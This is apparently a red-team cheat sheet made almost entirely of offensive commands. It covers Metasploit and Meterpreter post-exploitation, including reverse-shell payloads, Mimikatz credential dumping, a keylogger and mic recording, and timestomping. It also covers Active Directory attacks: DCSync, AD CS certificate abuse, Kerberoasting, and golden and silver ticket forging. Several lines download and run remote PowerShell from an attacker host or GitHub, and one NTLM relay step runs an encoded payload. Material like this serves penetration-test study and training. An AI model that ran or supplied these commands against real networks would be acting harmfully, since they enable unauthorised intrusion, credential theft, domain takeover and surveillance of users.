
Metasploit

$ sudo msfdb run // start database
$ sudo msfdb init // initialize database
$ msfdb --use-defaults delete // delete existing database
$ msfdb --use-defaults init // initialize database
$ msfdb status // database status
msf6 > workspace // show metasploit workspaces
msf6 > workspace -a <WORKSPACE> // add a workspace
msf6 > workspace -r <WORKSPACE> // rename a workspace
msf6 > workspace -d <WORKSPACE> // delete a workspace
msf6 > workspace -D // delete all workspaces
msf6 > db_nmap <OPTIONS> // run nmap and add the output to the database
msf6 > hosts // reads hosts from database
msf6 > services // reads services from database
msf6 > vulns // show vulnerabilities
msf6 > search // search within metasploit
msf6 > set RHOST <RHOST> // set remote host
msf6 > set RPORT <RPORT> // set remote port
msf6 > run // run exploit
msf6 > spool /PATH/TO/FILE // log screen output to a file
msf6 > save // saves current state
msf6 > exploit // using module exploit
msf6 > payload // using module payload
msf6 > auxiliary // using module auxiliary
msf6 > encoder // using module encoder
msf6 > nop // using module nop
msf6 > show sessions // show all current sessions
msf6 > sessions -i 1 // switch to session 1
msf6 > sessions -u <ID> // upgrade a shell to meterpreter
msf6 > sessions -k <ID> // kill a specific session
msf6 > sessions -K // kill all sessions
msf6 > jobs // show all current jobs
msf6 > show payloads // show available payloads
msf6 > set VERBOSE true // enable verbose output
msf6 > set forceexploit true // exploit the target regardless of the check result
msf6 > set EXITFUNC thread // the reverse shell can exit without terminating the host program
msf6 > set AutoLoadStdapi false // disable automatic loading of stdapi
msf6 > set PrependMigrate true // enable automatic process migration
msf6 > set PrependMigrateProc explorer.exe // automatically migrate to explorer.exe
msf6 > use post/PATH/TO/MODULE // use post exploitation module
msf6 > use post/linux/gather/hashdump // use hashdump for Linux
msf6 > use post/multi/manage/shell_to_meterpreter // shell to meterpreter
msf6 > use exploit/windows/http/oracle_event_processing_upload // use a specific module
C:\> Ctrl + z // put the active meterpreter shell in the background
meterpreter > load stdapi // load stdapi
meterpreter > background // put meterpreter in the background (same as "bg")
meterpreter > shell // get a system shell
meterpreter > channel -i <ID> // return to an existing meterpreter shell
meterpreter > ps // list processes
meterpreter > migrate 2236 // migrate to a process
meterpreter > getuid // get the user id
meterpreter > sysinfo // get system information
meterpreter > search -f <FILE> // search for a file
meterpreter > upload // upload a local file to the target
meterpreter > ipconfig // get network configuration
meterpreter > load powershell // loads powershell
meterpreter > powershell_shell // follow-up command after load powershell
meterpreter > powershell_execute // execute a command
meterpreter > powershell_import // import module
meterpreter > powershell_shell // shell
meterpreter > powershell_session_remove // remove
meterpreter > powershell_execute 'Get-NetNeighbor | Where-Object -Property State -NE "Unreachable" | Select-Object -Property IPAddress' // network discovery
meterpreter > powershell_execute '1..254 | foreach { "<XXX.XXX.XXX>.${_}: $(Test-Connection -TimeoutSeconds 1 -Count 1 -ComputerName <XXX.XXX.XXX>.${_} -Quiet)" }' // network scan
meterpreter > powershell_execute 'Test-NetConnection -ComputerName <RHOST> -Port 80 | Select-Object -Property RemotePort, TcpTestSucceeded' // port scan
meterpreter > load kiwi // load mimikatz
meterpreter > help kiwi // mimikatz help
meterpreter > kiwi_cmd // execute mimikatz native command
meterpreter > lsa_dump_sam // lsa sam dump
meterpreter > dcsync_ntlm krbtgt // dc sync
meterpreter > creds_all // dump all credentials
meterpreter > creds_msv // msv dump
meterpreter > creds_kerberos // kerberos dump
meterpreter > creds_ssp // ssp dump
meterpreter > creds_wdigest // wdigest dump
meterpreter > getprivs // get privileges after loading mimikatz
meterpreter > getsystem // get system privileges if the user is a member of the Administrators group
meterpreter > hashdump // dumps all the user hashes
meterpreter > run post/windows/gather/checkvm // check status of the target
meterpreter > run post/multi/recon/local_exploit_suggester // checking for exploits
meterpreter > run post/windows/manage/enable_rdp // enables rdp
meterpreter > run post/multi/manage/autoroute // runs autoroutes
meterpreter > run auxiliary/server/socks4a // runs socks4 proxy server
meterpreter > keyscan_start // enables keylogger
meterpreter > keyscan_dump // showing the output
meterpreter > screenshare // realtime screen sharing
meterpreter > screenshare -q 100 // realtime screen sharing
meterpreter > record_mic // recording mic output
meterpreter > timestomp // modify timestamps
meterpreter > execute -f calc.exe // starts a program on the victim
meterpreter > portfwd add -l <LPORT> -p <RPORT> -r 127.0.0.1 // port forwarding
Run Metasploit through a proxy
proxychains -q msfconsole
Loot output directory
/home/<USERNAME>/.msf4/loot/20200623090635_default_<RHOST>_nvms.traversal_680948.txt
Meterpreter listener
Generate a payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter_payload.exe
Set up a listener for Microsoft Windows
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
Download files
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o <FILE>.exe
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
.\<FILE>.exe
meterpreter > download *

Post-exploitation in domain and internal network environments

Account Operators group membership

Add a user
net user <USERNAME> <PASSWORD> /add /domain
net group "Exchange Windows Permissions" /add <USERNAME>
Import PowerView
powershell -ep bypass
. .\PowerView.ps1
Add DCSync rights
$pass = convertto-securestring '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=<DOMAIN>,DC=local" -PrincipalIdentity <USERNAME> -Rights DCSync
DCSync
impacket-secretsdump '<USERNAME>:<PASSWORD>@<RHOST>'

Active Directory Certificate Services (AD CS)

certipy find -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -vulnerable -stdout
ESC1: Misconfigured certificate templates
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE> -upn administrator@<DOMAIN> -dns <RHOST>
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
ESC2: Misconfigured certificate templates
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
ESC3: Enrollment agent templates
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
ESC4: Vulnerable certificate template access control
certipy template -username <USERNAME>@<DOMAIN> -password <PASSWORD> -template <TEMPLATE> -save-old
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE> -upn administrator@<DOMAIN>
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2
certipy find -username <USERNAME>@<DOMAIN> -password <PASSWORD> -vulnerable -dc-ip <RHOST> -stdout
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -upn administrator@<DOMAIN>
certipy req -ca '<CA>' -username administrator@<DOMAIN> -password <PASSWORD> -target <CA> -template User -upn administrator@<DOMAIN>
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
ESC7: Vulnerable certificate authority access control
certipy ca -ca '<CA>' -add-officer <USERNAME> -username <USERNAME>@<DOMAIN> -password <PASSWORD>
certipy ca -ca '<CA>' -enable-template SubCA -username <USERNAME>@<DOMAIN> -password <PASSWORD>
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template SubCA -upn administrator@<DOMAIN>
certipy ca -ca '<CA>' -issue-request <ID> -username <USERNAME>@<DOMAIN> -password <PASSWORD>
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -retrieve <ID>
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
ESC8: NTLM relay to AD CS HTTP endpoints
certipy relay -target 'http://<CA>'
certipy relay -ca '<CA>' -template <TEMPLATE>
python3 PetitPotam.py <RHOST> <DOMAIN>
certipy auth -pfx dc.pfx -dc-ip <RHOST>
export KRB5CCNAME=dc.ccache
impacket-secretsdump -k -no-pass <DOMAIN>/'dc$'@<DOMAIN>
Relay attack procedure
impacket-ntlmrelayx -t http://<RHOST>/certsrv/certfnsh.asp -smb2support --adcs --template <TEMPLATE>
python3 PetitPotam.py <RHOST> <DOMAIN>
python3 gettgtpkinit.py -pfx-base64 $(cat base64.b64) '<DOMAIN>'/'dc$' 'dc.ccache'
export KRB5CCNAME=dc.ccache
impacket-secretsdump -k -no-pass <DOMAIN>/'dc$'@<DOMAIN>
ESC9: No security extension
certipy shadow auto -username <USERNAME>@<DOMAIN> -password <PASSWORD> -account <USERNAME>
certipy account update -username <USERNAME>@<DOMAIN> -password <PASSWORD> -user <USERNAME> -upn Administrator
certipy req -ca '<CA>' -username <USERNAME> -hashes 54296a48cd30259cc88095373cec24da -template <TEMPLATE>
certipy account update -username <USERNAME>@<DOMAIN> -password <PASSWORD> -user <USERNAME> -upn <USERNAME>@<DOMAIN>
certipy auth -pfx administrator.pfx -domain <DOMAIN>
ESC10: Weak certificate mapping
Case 1
certipy shadow auto -username <USERNAME>@<DOMAIN> -password <PASSWORD> -account <USERNAME>
certipy account update -username <USERNAME>@<DOMAIN> -password <PASSWORD> -user <USERNAME> -upn Administrator
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -hashes a87f3a337d73085c45f9416be5787d86
certipy account update -username <USERNAME>@<DOMAIN> -password <PASSWORD> -user <USERNAME> -upn <USERNAME>@<DOMAIN>
certipy auth -pfx administrator.pfx -domain <DOMAIN>
Case 2
certipy shadow auto -username <USERNAME>@<DOMAIN> -password <PASSWORD> -account <USERNAME>
certipy account update -username <USERNAME>@<DOMAIN> -password <PASSWORD> -user <USERNAME> -upn 'DC$@<DOMAIN>'
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -hashes a87f3a337d73085c45f9416be5787d86
certipy account update -username <USERNAME>@<DOMAIN> -password <PASSWORD> -user <USERNAME> -upn <USERNAME>@<DOMAIN>
certipy auth -pfx dc.pfx -dc-ip <RHOST> -ldap-shell
ESC11: IF_ENFORCEENCRYPTICERTREQUEST
certipy relay -target 'rpc://<CA>' -ca '<CA>'
certipy auth -pfx administrator.pfx -domain <DOMAIN>

ADCSTemplate

Import-Module .\ADCSTemplate.psm1
New-ADCSTemplate -DisplayName TopCA -JSON (Export-ADCSTemplate -DisplayName 'Subordinate Certification Authority') -AutoEnroll -Publish -Identity '<DOMAIN>\Domain Users'

AD Miner

AD-miner -u <USERNAME> -p <PASSWORD> -cf <NAME>

BloodHound

sudo apt-get install openjdk-11-jdk
pip install bloodhound
sudo apt-get install neo4j
sudo apt-get install bloodhound
Install and start the database
wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
echo 'deb https://debian.neo4j.com stable 4.0' | sudo tee /etc/apt/sources.list.d/neo4j.list
sudo apt-get update
sudo apt-get install apt-transport-https
sudo apt-get install neo4j
systemctl start neo4j
./bloodhound --no-sandbox

http://localhost:7474/browser/

Docker container
docker run -itd -p 7687:7687 -p 7474:7474 --env NEO4J_AUTH=neo4j/<PASSWORD> -v $(pwd)/neo4j:/data neo4j:4.4-community
Reset the database password

http://localhost:7474/browser/

ALTER USER neo4j SET PASSWORD '<PASSWORD>'

bloodhound-python

bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -gc '<DOMAIN>' -ns <RHOST> -c all --zip
bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -dc '<RHOST>' -ns <RHOST> -c all --zip
bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -ns <RHOST> --dns-tcp -no-pass -c ALL --zip
bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -dc '<RHOST>' -ns <RHOST> --dns-tcp -no-pass -c ALL --zip

bloodyAD

bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get object Users --attr member // Get group members
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get object 'DC=<DOMAIN>,DC=local' --attr minPwdLength // Get minimum password length policy
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get object 'DC=<DOMAIN>,DC=local' --attr msDS-Behavior-Version // Get AD functional level
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get children 'DC=<DOMAIN>,DC=local' --type user // Get all users of the domain
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get children 'DC=<DOMAIN>,DC=local' --type computer // Get all computers of the domain
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get children 'DC=<DOMAIN>,DC=local' --type container // Get all containers of the domain
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> add uac <USERNAME> DONT_REQ_PREAUTH // Enable DONT_REQ_PREAUTH for ASREPRoast
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> remove uac <USERNAME> ACCOUNTDISABLE // Disable ACCOUNTDISABLE
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get object <USERNAME> --attr userAccountControl // Get UserAccountControl flags
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get object '<OBJECT>$' --attr msDS-ManagedPassword // Read GMSA account password
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get object '<OBJECT>$' --attr ms-Mcs-AdmPwd // Read LAPS password
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get object 'DC=<DOMAIN>,DC=local' --attr ms-DS-MachineAccountQuota // Read quota for adding computer objects to domain
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> add dnsRecord <RECORD> <LHOST> // Add a new DNS entry
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> remove dnsRecord <RECORD> <LHOST> // Remove a DNS entry
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get dnsDump // Get AD DNS records

Certify

https://github.com/GhostPack/Certify

.\Certify find /vulnerable
.\Certify.exe find /vulnerable /currentuser

Certipy

Reference: https://github.com/ly4k/Certipy
Reference: https://github.com/ly4k/BloodHound/

certipy find -dc-ip <RHOST> -u <USERNAME>@<DOMAIN> -p <PASSWORD>
certipy find -dc-ip <RHOST> -u <USERNAME> -p <PASSWORD> -vulnerable -stdout
Create an account
certipy account create -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -dns <DOMAIN_CONTROLLER_DNS_NAME> -user <COMPUTERNAME>
Authenticate
certipy auth -pfx <FILE>.pfx -dc-ip <RHOST> -u <USERNAME> -domain <DOMAIN>
LDAP shell
certipy auth -pfx <FILE>.pfx -dc-ip <RHOST> -u <USERNAME> -domain <DOMAIN> -ldap-shell
# add_user <USERNAME>
# add_user_to_group <GROUP>
Certificate forgery
certipy template -username <USERNAME>@<DOMAIN> -password <PASSWORD> -template Web -dc-ip <RHOST> -save-old
Certificate request

Due to a current issue in certipy, run the following command twice

certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST>
certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST> -upn <USERNAME>@<DOMAIN> -dns <FQDN>
certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST> -upn <USERNAME>@<DOMAIN> -dns <FQDN> -debug
Revert changes
certipy template -username <USERNAME>@<DOMAIN> -password <PASSWORD> -template <TEMPLATE> -dc-ip <RHOST> -configuration <TEMPLATE>.json
Start the BloodHound fork
./BloodHound --disable-gpu-sandbox

enum4linux-ng

enum4linux-ng -A <RHOST>

Evil-WinRM

evil-winrm -i <RHOST> -u <USERNAME> -p <PASSWORD>
evil-winrm -i <RHOST> -c /PATH/TO/CERTIFICATE/<CERTIFICATE>.crt -k /PATH/TO/PRIVATE/KEY/<KEY>.key -p -u -S

Impacket

impacket-atexec -k -no-pass <DOMAIN>/Administrator@<DOMAIN_CONTROLLER>.<DOMAIN> 'type C:\PATH\TO\FILE\<FILE>'
impacket-GetADUsers -all -dc-ip <RHOST> <DOMAIN>/
impacket-getST <DOMAIN>/<USERNAME>$ -spn WWW/<DOMAIN_CONTROLLER>.<DOMAIN> -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
impacket-lookupsid <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-netview <DOMAIN>/<USERNAME> -targets /PATH/TO/FILE/<FILE>.txt -users /PATH/TO/FILE/<FILE>.txt
impacket-reg <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <ACTION> <ACTION>
impacket-rpcdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-samrdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-services <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <ACTION>
impacket-smbpasswd <RHOST>/<USERNAME>:'<PASSWORD>'@<RHOST> -newpass '<PASSWORD>'
impacket-smbserver local . -smb2support
IMPACKET-SMBCLIENT
impacket-smbclient <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
export KRB5CCNAME=<USERNAME>.ccache
impacket-smbclient -k <DOMAIN>/<USERNAME>@<RHOST>.<DOMAIN> -no-pass
IMPACKET-GETST
impacket-getST <DOMAIN>/<USERNAME> -spn <USERNAME>/<RHOST> -hashes :<HASH> -impersonate <USERNAME>
impacket-getST <DOMAIN>/<USERNAME>$ -spn <USERNAME>/<RHOST> -hashes :<HASH> -impersonate <USERNAME>
IMPACKET-GETTGT
impacket-getTGT <RHOST>/<USERNAME>:<PASSWORD>
impacket-getTGT <RHOST>/<USERNAME> -dc-ip <RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:7c662956a4a0486a80fbb2403c5a9c2c
IMPACKET-GETNPUSERS
impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format john -outputfile hashes
impacket-GetNPUsers <DOMAIN>/<USERNAME> -request -no-pass -dc-ip <RHOST>
IMPACKET-GETUSERSPNS
impacket-GetUserSPNs -request -dc-ip <RHOST> <DOMAIN>/<USERNAME>
export KRB5CCNAME=<USERNAME>.ccache
impacket-GetUserSPNs <DOMAIN>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<DOMAIN> -no-pass -request
IMPACKET-SECRETSDUMP
impacket-secretsdump <DOMAIN>/<USERNAME>@<RHOST>
impacket-secretsdump -dc-ip <RHOST> <DOMAIN>/<USERNAME>:<PASSWORD>@<RHOST>
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
impacket-secretsdump -ntds ntds.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash
export KRB5CCNAME=<USERNAME>.ccache
impacket-secretsdump -k <DOMAIN>/<USERNAME>@<RHOST>.<DOMAIN> -no-pass -debug
IMPACKET-LOOKUPSID
impacket-lookupsid <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
IMPACKET-NETVIEW
impacket-netview <DOMAIN>/<USERNAME> -targets /PATH/TO/FILE/<FILE>.txt -users /PATH/TO/FILE/<FILE>.txt
IMPACKET-NTLMRELAYX
Common Commands
impacket-ntlmrelayx -t ldap://<RHOST> --no-wcf-server --escalate-user <USERNAME>
Example
impacket-ntlmrelayx --no-http-server -smb2support -t <RHOST> -c "powershell -enc JABjAGwAaQBlAG4AdA<--- CUT FOR BREVITY --->"
dir \\<LHOST>\foobar
nc -lnvp <LPORT>
IMPACKET-PSEXEC
impacket-psexec <USERNAME>@<RHOST>
impacket-psexec <RHOST>/administrator@<RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
IMPACKET-REG
impacket-reg <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <COMMAND> <COMMAND>
IMPACKET-RPCDUMP
impacket-rpcdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
IMPACKET-SAMRDUMP
impacket-samrdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
IMPACKET-SERVICES
impacket-services <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <COMMAND>
IMPACKET-SMBPASSWD
impacket-smbpasswd <RHOST>/<USERNAME>:'<PASSWORD>'@<RHOST> -newpass '<PASSWORD>'
IMPACKET-SMBSERVER
impacket-smbserver local . -smb2support
IMPACKET-TICKETER
Requirements
  • A valid user
  • NT hash
  • Domain SID
export KRB5CCNAME=<USERNAME>.ccache
impacket-ticketer -nthash C1929E1263DDFF6A2BCC6E053E705F78 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain <RHOST> -spn MSSQLSVC/<RHOST>.<RHOST> -user-id 500 Administrator
Fix "[-] exceptions must derive from BaseException"
Issue
impacket-GetUserSPNs <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip <DOMAIN_CONTROLLER>.<RHOST> -no-pass -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] exceptions must derive from BaseException
How to fix it
241         if self.__doKerberos:
242             #target = self.getMachineName()
243             target = self.__kdcHost
dacledit.py

https://github.com/fortra/impacket/blob/204c5b6b73f4d44bce0243a8f345f00e308c9c20/examples/dacledit.py

python3 dacledit.py <DOMAIN>/<USERNAME>:<PASSWORD> -k -target-dn 'DC=<DOMAIN>,DC=<DOMAIN>' -dc-ip <RHOST> -action read -principal '<USERNAME>' -target '<GROUP>' -debug
Fix the msada_guids error
#from impacket.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
from msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS

Then place msada_guids.py in the same directory as dacledit.py

https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/helpers/msada_guids.py

owneredit.py

https://github.com/fortra/impacket/blob/5c477e71a60e3cc434ebc0fcc374d6d108f58f41/examples/owneredit.py

python3 owneredit.py -k '<DOMAIN>/<USERNAME>:<PASSWORD>' -dc-ip <RHOST> -action write -new-owner '<USERNAME>' -target '<GROUP>' -debug

JAWS

IEX(New-Object Net.webclient).downloadString('http://<LHOST>:<LPORT>/jaws-enum.ps1')

Kerberos

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

General notes
  • A Golden Ticket is a Ticket Granting Ticket (TGT), forged completely offline (requires the KRBTGT account hash).
  • A Silver Ticket is a forged service authentication ticket (requires the Service Principal Name (SPN) and the machine account key (hash in RC4 or AES)). Silver Tickets never touch the Domain Controller (DC).
  • A Diamond Ticket is essentially a Golden Ticket, but one requested from the Domain Controller (DC).
Brute force
./kerbrute -domain <DOMAIN> -users <FILE> -passwords <FILE> -outputfile <FILE>
With a user list
.\Rubeus.exe brute /users:<FILE> /passwords:<FILE> /domain:<DOMAIN> /outfile:<FILE>
Check a password against all users in the domain
.\Rubeus.exe brute /passwords:<FILE> /outfile:<FILE>
ASREPROAST
Check ASREPRoast for all domain users (credentials required)
impacket-GetNPUsers <DOMAIN>/<USERNAME>:<PASSWORD> -request -format hashcat -outputfile <FILE>
impacket-GetNPUsers <DOMAIN>/<USERNAME>:<PASSWORD> -request -format john -outputfile <FILE>
Check ASREPRoast for a list of users (no credentials required)
impacket-GetNPUsers <DOMAIN>/ -usersfile <FILE> -format hashcat -outputfile <FILE>
impacket-GetNPUsers <DOMAIN>/ -usersfile <FILE> -format john -outputfile <FILE>
Check ASREPRoast for all domain users in the domain
.\Rubeus.exe asreproast /format:hashcat /outfile:<FILE>
KERBEROASTING
impacket-GetUserSPNs <DOMAIN>/<USERNAME>:<PASSWORD> -outputfile <FILE>
.\Rubeus.exe kerberoast /outfile:<FILE>
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII <FILE>
Invoke-Kerberoast -OutputFormat john | % { $_.Hash } | Out-File -Encoding ASCII <FILE>
Overpass the Hash / Pass the Key (PTK)
Request a TGT with a hash
impacket-getTGT <DOMAIN>/<USERNAME> -hashes <LMHASH>:<NTLMHASH>
Request a TGT with an aesKey (stronger encryption, possibly stealthier since it is the default)
impacket-getTGT <DOMAIN>/<USERNAME> -aesKey <KEY>
Request a TGT with a password
impacket-getTGT <DOMAIN>/<USERNAME>:<PASSWORD>
Set the TGT for Impacket to use
export KRB5CCNAME=<USERNAME>.ccache
Execute remote commands
impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
Ask for a ticket and inject it
.\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USERNAME> /rc4:<NTLMHASH> /ptt
Execute CMD on the remote host
.\PsExec.exe -accepteula \\<RHOST> cmd
Pass the Ticket (PTT)
Harvesting tickets on Linux
Check the type and location of tickets
grep default_ccache_name /etc/krb5.conf
  • If nothing is returned, the default is FILE:/tmp/krb5cc_%{uid}
  • If they are FILE tickets, they can be copied and pasted to use them
  • If they are KEYRING tickets, the tickey tool can be used to get them
  • To dump user tickets, if running as root, it is recommended to dump them by injecting into the other users' processes
  • To inject, the ticket must be copied to a folder accessible to all users
cp tickey /tmp/tickey
/tmp/tickey -i
Harvesting tickets from Windows
sekurlsa::tickets /export
.\Rubeus dump
Convert a base64 ticket dumped by Rubeus
[IO.File]::WriteAllBytes("<TICKET>.kirbi", [Convert]::FromBase64String("<TICKET>"))
Convert tickets between Linux and Windows formats with ticket_converter.py

https://github.com/Zer1t0/ticket_converter

python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi
Use a ticket on Linux
export KRB5CCNAME=<USERNAME>.ccache
Execute remote commands with the TGT
impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
Use a ticket on Windows
Inject a ticket with mimikatz
kerberos::ptt <KIRBI_FILE>
Inject a ticket with Rubeus
.\Rubeus.exe ptt /ticket:<KIRBI_FILE>
Execute CMD on the remote host
.\PsExec.exe -accepteula \\<RHOST> cmd
Silver Ticket
Impacket examples
Generate a TGS with NTLM
python ticketer.py -nthash <NTLMHASH> -domain-sid <SID> -domain <DOMAIN> -spn <SPN> <USERNAME>
Generate a TGS with an aesKey
python ticketer.py -aesKey <KEY> -domain-sid <SID> -domain <DOMAIN> -spn <SPN> <USERNAME>
Import into the local ticket cache
export KRB5CCNAME=<USERNAME>.ccache
Execute remote commands with the TGT
impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
Mimikatz examples
Generate a TGS with NTLM
kerberos::golden /domain:<DOMAIN> /sid:<SID> /rc4:<NTLMHASH> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>
Generate a TGS with an AES 128 key
kerberos::golden /domain:<DOMAIN> /sid:<SID> /aes128:<KEY> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>
Generate a TGS with an AES 256 key (stronger encryption, possibly stealthier since it is the default)
kerberos::golden /domain:<DOMAIN> /sid:<SID> /aes256:<KEY> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>
Inject the TGS with Mimikatz
kerberos::ptt <KIRBI_FILE>
Rubeus example
.\Rubeus.exe ptt /ticket:<KIRBI_FILE>
Execute CMD on the remote host
.\PsExec.exe -accepteula \\<RHOST> cmd
Golden Ticket
Impacket examples
Generate a TGT with NTLM
python ticketer.py -nthash <KRBTGT_NTLM_HASH> -domain-sid <SID> -domain <DOMAIN> <USERNAME>
Generate a TGT with an aesKey
python ticketer.py -aesKey <KEY> -domain-sid <SID> -domain <DOMAIN> <USERNAME>
Set the TGT for Impacket to use
